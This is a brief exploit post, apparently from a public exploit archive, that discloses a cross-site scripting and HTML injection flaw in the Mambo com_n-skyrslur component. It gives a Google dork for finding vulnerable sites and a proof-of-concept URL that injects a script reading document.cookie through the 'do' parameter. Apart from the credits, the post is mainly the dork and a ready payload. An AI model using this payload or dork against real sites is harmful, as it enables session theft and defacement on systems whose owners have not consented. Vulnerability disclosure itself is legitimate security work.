Mambo N-Skyrslur component suffers from a cross site scripting vulnerability.
ec803675e6f2f4609eddd051566004249cef583603d8476ec011893d38460817
-------------------------------------------------------------------------------------------------------------------------------
# Exploit Title: Mambo Component com_n-skyrslur XSS & HTML Injection Vulnerability
# Google Dork: inurl:index.php?option=com_n-skyrslur
# Date: 01/09/2011
# Author: CoBRa_21 (Penetration Tester)
# E-Mail: ghost1lover@hotmail.com
# Software Link: https://www.netvistun.is/
# Tested on: FreeBSD 6.1 (remote host)
-------------------------------------------------------------------------------------------------------------------------------
Exploit
https://localhost/[PATH]/index.php?option=com_n-skyrslur&Itemid=51&do=<script>alert(document.cookie)</script>
-------------------------------------------------------------------------------------------------------------------------------
Thanks E-Banka.Org & Cyber-Warrior.Org
-------------------------------------------------------------------------------------------------------------------------------